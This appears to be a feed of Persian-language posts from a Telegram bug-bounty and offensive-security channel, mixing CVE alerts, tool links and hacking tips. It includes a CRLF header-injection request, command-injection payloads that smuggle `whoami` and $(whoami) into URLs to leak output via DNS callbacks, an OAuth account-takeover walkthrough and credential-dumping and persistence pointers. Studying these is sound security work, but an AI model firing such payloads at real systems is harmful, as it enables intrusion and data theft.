-
offensive security☕️ گروه : @sec_gap 💣 python : t.me/persianpylearn admin : @Onthebytes💻 #bug_bounty #offsec
🧨 CRLF Injection
اگه دیدی میتونی با %0d%0a (CRLF) توی مسیر URL هدر جدید بسازی، احتمالا با CRLF Injection طرفی.
مثال:
https://target-site.com/%0d%0aX-Custom-Header%3Atest
GET /%0d%0aX-Custom-Header%3Atest HTTP/2
Host: target-site.com
X-Custom-Header: test
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻Читать полностью…
GROUP ™️
@mandegar_sec | channel
🪲 Recon Tip That Actually Saves Time
❌بزرگترین اشتباه تو باگ بانتی؟
غرق شدن تو هزاران خط JavaScript بدون هدف.
به جای خوندن همه چیز، دنبال نشونه ها بگرد.
از دل همین key ها میشه فهمید:
چه پارامترهایی وجود دارن ولی تو UI نیستن
چه API هایی internal هستن
چه feature flag هایی فعال/غیرفعالن
بهجای اسکرولکردن کورکورانه، داده رو استخراج کن:
find . -name '*.js' | jsluice query -q '(pair key:(_)) @k' | nvim
@mandegar_sec | Group™️
چهل روز گذشت…🖤🕊
چهل روز از فقدان جانسوز عزیزانی میگذرد که نبودشان اندوهی عمیق و ماندگار در دلها بر جای نهاده است.
این روزها، فرصتی است برای درنگی دوباره بر یاد و خاطرهی آنان که حضورشان سرشار از مهر، انسانیت و روشنیبخش دلها بود.
در چهلمین روز فقدانشان، با ادای احترام به مقام و یادشان، بار دیگر مراتب همدردی و تسلیت خود را به خانوادههای سوگوار ابراز میداریم.
برای آن عزیزان آرامش و رحمت ابدی، و برای بازماندگان صبر، شکیبایی و آرامش قلبی آرزومندیم.
Forty Days Have Passed…🖤🕊
Forty days have passed since the heartbreaking loss of beloved souls whose absence has left a deep and lasting sorrow in our hearts.
These days offer a moment to pause and reflect upon the memory of those whose presence was filled with kindness, humanity, and light.
On this fortieth day of their passing, we respectfully honor their memory and once again extend our heartfelt condolences to their bereaved families and loved ones.
May they be granted eternal peace and mercy, and may patience, strength, and comfort be bestowed upon those who continue to mourn their loss.
کی میتونه این پلن دانشجویی یک ساله رایگان کرسر رو بگیره
باهم استفاده کنیم☹️
https://cursor.com/students
0.0.0.0 Day: Exploiting Localhost APIs From the Browser | Oligo Security
https://www.oligo.security/blog/0-0-0-0-day-exploiting-localhost-apis-from-the-browser
@mandegar_sec | security researcherЧитать полностью…
🚀 OWASP Smart Contract Top 10 | نسخه 2026 منتشر شد
پروژه OWASP Smart Contract Top 10 که زیرمجموعهی OWASP Smart Contract Security هست، لیستی از ۱۰ تهدید بحرانی امنیتی در قراردادهای هوشمند منتشر کرده که برای توسعه دهندگان Web3 و تیمهای امنیتی اهمیت بالایی داره. این لیست از دادههای واقعی حملات و آسیب پذیریها در سال ۲۰۲۵ استخراج شده تا پیش بینی کنه چه ضعف هایی در ۲۰۲۶ بیشترین خطر رو دارن
📎 برای جزئیات کاملتر میتونید از سایت رسمی OWASP دیدن کنید: https://owasp.org/www-project-smart-contract-top-10/
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
@mandegar_sec | channel
Group™️
Semgrep Rules: A collection of Semgrep rules to facilitate vulnerability research.👾
Github: https://github.com/0xdea/semgrep-rules
@mandegar_sec | ChannelЧитать полностью…
Group🫶
جزوه کوتاه درباره اصول امنیت عملیاتی (OPSEC) در فضای مجازی
Читать полностью…
Persistence With ssh Keys
یکی از قابلیت های خود SSH این هستش به جای احراز هویت از طریق پسورد میتونیم یک کلید عمومی و خصوصی درست کنیم
ssh-keygen
ADCS Attack Techniques Cheatsheet
https://docs.google.com/spreadsheets/d/1E5SDC5cwXWz36rPP_TXhhAvTvqz2RGnMYXieu4ZHx64
@mandegar_sec | channel
Group🕊
Moltbot One-click RCE PoC #Moltbot #RCE
https://github.com/ethiack/moltbot-1click-rce
@mandegar_sec | channel
تو تست IDOR فقط به enumirate با عدد ID اکتفا نکن.
یه کار مهم تر اینه که همون endpoint رو با متدهای مختلف HTTP تست کنی؛ مخصوصا
PUT، PATCH و DELETE
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻Читать полностью…
@mandegar_sec | channel
Group™️
⚠️ کاربرای NGINX حواستون باشه!
دیروز یه CVE جدید برای NGINX منتشر شده که مربوط به SSL upstream injection .
اگه از نسخههای آسیبپذیر استفاده میکنید، حتما هرچه سریع تر آپدیت کنید.
✅ نسخه های امن:
v1.28.2
v1.29.5
🔐 اگه از serversideup/php استفاده میکنید، خبر خوب اینکه پچ تو آخرین ریلیز اضافه شده:
نسخه: v4.3.1
https://github.com/serversideup/docker-php/releases/tag/v4.3.1
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻Читать полностью…
@mandegar_sec | channel
Group™️
✏️ یک گروه پژوهشی در حال تکمیل فرآیند ارزیابی علمی طرح «رصد فناوریهای کلیدی و روندهای نوظهور در حوزه امنیت سایبری با تأکید بر توانمندسازی داخلی» است.
این پژوهش بر پایه تحلیل گسترده دادههای اختراعات، مقالات علمی و گزارشهای معتبر بینالمللی انجام شده و اکنون در مرحله اعتبارسنجی نهایی با بهرهگیری از دیدگاههای متخصصان و صاحبنظران حوزه قرار دارد.
لازم به ذکر است این فناوریها بدون هیچ فیلتری در این پرسشنامه قرار گرفتهاند.
برای تکمیل این مرحله، از شما دعوت میکنیم با اختصاص چند دقیقه از زمان خود، در پرسشنامه اعتبارسنجی پژوهش شرکت نمایید. مشارکت شما به ارتقای کیفیت و اتقان نتایج این مطالعه کمک خواهد کرد.
لینک پرسشنامه:
https://survey.porsline.ir/s/nUhSv2QA
Kubernetes API Server Paths 🤳
/api
/api/v1
/apis
/apis
/apis/admissionregistration.k8s.io
/apis/admissionregistration.k8s.io/v1beta1
/apis/apiextensions.k8s.io
/apis/apiextensions.k8s.io/v1beta1
/apis/apiregistration.k8s.io
/apis/apiregistration.k8s.io/v1
/apis/apiregistration.k8s.io/v1beta1
/apis/apps
/apis/apps/v1
/apis/apps/v1beta1
/apis/apps/v1beta2
/apis/authentication.k8s.io
/apis/authentication.k8s.io/v1
/apis/authentication.k8s.io/v1beta1
/apis/authorization.k8s.i
/apis/authorization.k8s.io/v1
/apis/authorization.k8s.io/v1beta1
/apis/autoscaling
/apis/autoscaling/v1
/apis/autoscaling/v2beta1
/apis/batch
/apis/batch/v1
/apis/batch/v1beta1
/apis/certificates.k8s.io
/apis/certificates.k8s.io/v1beta1
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻Читать полностью…
@mandegar_sec | channel
Group™️
🚨 Critical Vulnerability in Jinjava CVE-2026-25526 (CVSS 9.8)
یه ضعف خیلی جدی در Jinjava کشف شده که امنیت sandbox رو زیر سوال میبره.
به مهاجمین این امکان رو میده با سوءاستفاده از template loop ها کد جاوا اجرا کنن، حتی وقتی sandbox فعال باشه.
⚡ شدت: 9.8 / Critical
📌 توصیه فوری: آپدیت به v2.8.3
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻Читать полностью…
@mandegar_sec | channel
Group™️
🎯 Initial Access هنر نفوذ اولیه
راهنمای جامع ردتیم برای بهدست آوردن دسترسی اولیه به هدف:
این مجموعه، طیف کاملی از تکنیکهای رایج و پیشرفته را پوشش میدهد، از جمله:
توسعه پیلود (DLL Sideloading، لودرهای Shellcode، سوء استفاده از Syscall ها)
➖ HTML Smuggling
فیشینگ پیشرفته (Quishing مبتنی بر QR Code، فیشینگ از طریق Microsoft Teams)
حملات AitM و دور زدن MFA (ابزارهایی مانند Evilginx و تکنیک Device Code Phishing)
➖ Password Spraying
بهرهبرداری از اپلیکیشنهای در معرض اینترنت
➖ Vishing (مهندسی اجتماعی تلفنی)
دسترسی فیزیکی (ابزارهایی مانند Rubber Ducky و Bash Bunny)
حملات زنجیره تأمین (Supply Chain) همراه با مطالعات موردی واقعی از گروههای APT
در واقع Initial Access نقطه آغاز هر عملیات موفق است جایی که ترکیب تکنیک، خلاقیت و شناخت رفتار انسانی، مسیر نفوذ را هموار میکند.
https://0xdbgman.github.io/posts/initial-access-the-art-of-getting-in/
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->🖤🕊Читать полностью…
@mandegar_sec | channel
Group™️
📌 ابلاغ برنامه جذب و نگهداشت نیروی متخصص در حوزه فناوری اطلاعات و امنیت سایبری
بر اساس مصوبه ستاد توسعه علوم و فناوریهای دانشبنیان و ابلاغ سازمان اداری و استخدامی کشور، برنامهای با هدف جذب و نگهداشت نیروی انسانی متخصص در حوزه فناوری اطلاعات و امنیت سایبری تصویب شد.
در چارچوب این مصوبه، امکان افزایش سقف حقوق و مزایا برای مشاغل تخصصی این حوزه از جمله:
▪️ مدیر فناوری اطلاعات
▪️ مهندس امنیت اطلاعات
▪️ مهندس شبکه و زیرساخت
▪️ متخصص علم داده
▪️ طراح و توسعهدهنده نرمافزار
و سایر عناوین مرتبط
بر اساس جدول اعلامی فراهم شده است.
این اقدام در راستای تقویت توانمندیهای تخصصی کشور در حوزههای راهبردی فناوری اطلاعات و امنیت سایبری ارزیابی میشود.
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
@mandegar_sec | channel
Group™️
❌OAuth State Parameter Misbinding → Account Takeover
POC →
1. هنگام بررسی فلو OAuth، مشخص شد state تولید میشه اما در callback به session کاربر بایند نشده.
2. مهاجم یک لاگین OAuth روی اکانت خودش شروع میکنه و پاسخ authorization رو ذخیره میکنه.
3. قربانی مجبور میشه فلو OAuth رو با state کنترلشده توسط مهاجم کامل کنه.
4. اپلیکیشن mismatch بودن state رو تشخیص نمیده و درخواست رو قبول میکنه.
5. سشن قربانی به authorization مهاجم لینک میشه.
6.در نتیجه Account Takeover کامل از طریق OAuth Misbinding رخ میده.
🎯 TIPS :
- امنیت OAuth بهشدت وابسته به اعتبارسنجی دقیق state هست.
- state باید در سمت سرور و به session همون کاربر بایند بشه.
- ضعف هایه لاجیک در پیادهسازی OAuth، این روزها تو اپهای مدرن زیاد دیده میشه.
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
@mandegar_sec | channel
Group™️
اگه به یه Blind SSRF رسیدی، فقط به همون اکتفا نکن.
یه قدم جلوتر برو و چک کن ببین پشتش OS Command Injection خوابیده یا نه.
خیلی وقتا SSRF ورودی رو میبره داخل یه context سیستمی.
اگه اون ورودی داخل shell اجرا بشه، میتونی خروجی دستور رو از طریق DNS بیرون بکشی (OOB).
برای گرفتن تعامل خارجی (DNS / HTTP) از Interactsh استفاده کن:
http://app.interactsh.com
TEST KEYS :🍸
اگه این payload ها باعث بشن یه DNS request با مقدار واقعی سیستم سمت سرور برگرده، یعنی قضیه جدیه 👀
https://`whoami`.your-id.oast.fun
https://$(whoami).your-id.oast.fun
https://${USER}.your-id.oast.fun
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
@mandegar_sec | channel
Group🕊
🚨 یه بازیگر تهدید جدید به اسم Amaranth-Dragon وارد صحنه شده که احتمال میدن به نهادهای اطلاعاتی چین مرتبط باشه و ظاهراً سراغ اهداف حساس و استراتژیک رفته.
طبق گزارش Check Point Research، این کمپین جاسوسی سایبری از آسیبپذیری
CVE-2025-8088 در WinRAR برای نفوذ استفاده میکنه.
🔍 روند حمله چطوریه؟
1️⃣ شروع کار با یه ایمیل فیشینگ که داخلش یه فایل RAR آلوده قرار داره.
2️⃣ با سوءاستفاده از باگ WinRAR، یه اسکریپت مخرب بدون اینکه کاربر متوجه بشه داخل پوشه Startup سیستم استخراج میشه.
3️⃣ سیستم آلوده به سرور فرماندهی و کنترل (C2) وصل میشه تا payload اصلی و کلید رمزگشایی رو دریافت کنه.
در نهایت مهاجم میتونه کنترل زیرساخت هدف رو به دست بگیره؛ ابزار هایی مثل Havoc C2 یا TGAmaranth RAT هم تو این عملیات دیده شدن.
🌍 یه نکته جالب اینه که سرور C2 فقط در صورتی پاسخ میده که IP قربانی متعلق به یه منطقه جغرافیایی مشخص باشه ،یعنی کمپین کاملاً هدفمند طراحی شده.
این ماجرا دوباره نشون میده که حتی ابزارهای رایج مثل WinRAR، اگه بهموقع آپدیت نشن، میتونن تبدیل به نقطه ورود حملات پیشرفته بشن.
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻Читать полностью…
@mandegar_sec | channel
Group🍸
سلام رفقا
اگ انتقاد یا پیشنهادی دارین نسبت به چنل خوشحال میشم بهم بگید
@Onthebytes
@msecadmins_bot
🔥 Credential Dumping with NetExec | Cheatsheet 2026
در این ویدیو، ابزار NetExec (نسخه توسعه یافته CrackMapExec) بهصورت عملی معرفی و بررسی شده است.
تمرکز اصلی آموزش بر استفاده از این ابزار در سناریوهای شبکه و محیطهای Active Directory میباشد.
در این محتوا مشاهده خواهید کرد:
➖ نحوه کار با NetExec در عملیاتهای شبکه
➖ اجرای دستورات کاربردی برای تحلیل و شناسایی
➖ مفاهیم مرتبط با Credential Dumping در سیستم های ویندوزی
➖ کاربرد عملی دستورات شبکه در مدیریت و ارزیابی امنیت سیستمها
این آموزش برای افرادی که در حوزههای Red Team، تست نفوذ داخلی، یا امنیت Active Directory فعالیت میکنند، میتواند مفید و کاربردی باشد.
🎥 لینک ویدیو:
https://youtu.be/h46f_0pOeLo?si=i9yOqv59b736O4Wj
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻Читать полностью…
@mandegar_sec | channel
Group🖤
🚀Extract IPs from Shodan HTML in Seconds!
Sick of digging through HTML? Let grep do the work! 💻
grep -oP '(?<=<strong>).*?(?=</strong>)' ip.html > ips
ips! برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻Читать полностью…
@mandegar_sec | channel
Group🧣
🚨 CVE-2025-64328 | امتیاز 8.6 (High)
FreePBX
یه پنل مدیریتی تحت وب برای راهاندازی و مدیریت سیستمهای تلفنی مبتنی بر Asterisk (VoIP) هست.
Affected versions :
> = 17.0.2.36 && < 17.0.3
Patched versions : 17.0.3
testconnection →check_ssh_connect()
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻Читать полностью…
@mandegar_sec | channel
Group™️
سلام عزیزان
این پرسشنامه رو یکی از مخاطبین زحمت کشیده و آماده کرده
خوشحال میشم شرکت کنید 🍸
CVE-2025-40554 – SolarWinds Web Help Desk
*
Auth Bypass PoC